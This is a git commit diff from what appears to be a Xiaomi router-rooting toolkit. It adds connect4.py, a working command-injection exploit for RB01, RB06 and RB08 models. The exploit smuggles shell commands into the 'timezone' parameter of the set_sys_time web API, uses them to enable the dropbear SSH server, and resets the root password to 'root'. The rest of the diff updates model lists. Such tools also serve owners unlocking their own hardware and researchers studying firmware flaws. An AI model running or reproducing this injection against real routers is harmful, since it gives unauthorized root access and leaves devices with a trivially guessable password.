Add new exploit for RB01, RB06, RB08

3 years ago · b7702b432d
parent a9f9d1b5d8
commit b7702b432d
3 changed files with 92 additions and 4 deletions
--- a/connect.py
+++ b/connect.py
@ -31,7 +31,7 @@ if gw.status < 1:

 dn = gw.device_name

-if dn == 'R2100' or dn == 'R2350' or dn == 'RM1800' or dn == 'RM2100' or dn == 'RA67':
+if dn in 'R2100 R2350 RM1800 RM2100 RA67':
  import connect2
  sys.exit(0)

@ -39,10 +39,14 @@ if dn == 'R3600' and gw.rom_version == '1.0.17':
  import connect2
  sys.exit(0)

-if dn == 'R3600' or dn == 'RA69' or dn == 'RA70' or dn == 'RA72' or dn == 'RB03':
+if dn in 'R3600 RA69 RA70 RA72':
  import connect3
  sys.exit(0)

+if dn in 'RB01 RB03 RB06 RB08':
+  import connect4
+  sys.exit(0)
+
 print("device_name =", gw.device_name)
 print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
 print("mac = {}".format(gw.mac_address))
--- a/connect4.py
+++ b/connect4.py
@ -0,0 +1,70 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import os
+import sys
+import types
+import platform
+import ctypes
+import binascii
+import re
+import requests
+import urllib
+
+sys.path.append(os.path.dirname(os.path.abspath(__file__)))
+from gateway import *
+
+# Devices:
+# RB01    FW any        AX3200
+# RB06    FW any        Redmi AX6000
+# RB08    FW any        WifiHome
+
+
+gw = Gateway(timeout = 4, detect_ssh = False)
+if gw.status < 1:
+  die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
+
+print("device_name =", gw.device_name)
+print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
+print("mac address = {}".format(gw.mac_address))
+
+dn = gw.device_name
+gw.ssh_port = 22
+ret = gw.detect_ssh(verbose = 1, interactive = True)
+if ret > 0:
+  die(0, "SSH server already installed and running")
+
+stok = gw.web_login()
+
+def exec_cmd(cmd = {}, api = 'misystem/set_sys_time'):
+  params = cmd
+  if isinstance(cmd, str):
+    params = { 'timezone': " ' ; " + cmd + " ; " }
+  res = requests.get(gw.apiurl + api, params = params)
+  return res.text
+
+res = exec_cmd(api = 'xqnetwork/get_netmode')
+if '"code":0' not in res:
+  die('Extension "/api/xqnetwork/get_netmode" not working!')
+if '"netmode":4,' not in res:
+  die('It is necessary to reorganize the device into "whc_cap" mode!')
+
+#res = exec_cmd('logger hello_world_3335556_')
+res = exec_cmd("sed -i 's/`nvram get ssh_en`/1/g' /etc/init.d/dropbear")
+if '"code":0' not in res:
+  die('Exploit not working!!!')
+res = exec_cmd("sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
+res = exec_cmd("(echo root; sleep 1; echo root) | passwd root")
+res = exec_cmd("/etc/init.d/dropbear enable")
+print('Run SSH server on port 22 ...')
+res = exec_cmd("/etc/init.d/dropbear restart")
+res = exec_cmd("logger -t XMiR ___completed___")
+
+time.sleep(0.5)
+gw.use_ssh = True
+gw.passw = 'root'
+gw.ping(contimeout = 10)   # RSA host key generate slowly!
+
+print("")
+print('#### SSH and Telnet services are activated! ####')
+
--- a/xqimage.py
+++ b/xqimage.py
@ -80,8 +80,22 @@ xqModelList = [
  "RA74",           # AX5400
  "<unk48>",
  "YY01",
-  "RB01",    # 50
-  "RB03"     # 51
+  "RB01",    # 50   # AX3200 (INT)
+  "RB03",    # 51   # AX6S
+  "<unk52>",
+  "<unk53>",
+  "RB04",    # 54   # Redmi AX5400
+  "<unk55>",
+  "<unk56>",
+  "<unk57>",
+  "RB08",    # 58   # HomeWiFi
+  "<unk59>",
+  "<unk60>",
+  "RB06",    # 61   # Redmi AX6000
+  "<unk62>",
+  "<unk63>",
+  "CB04",    # 64
+  "CB0401",  # 65
 ]

 def get_modelid_by_name(name):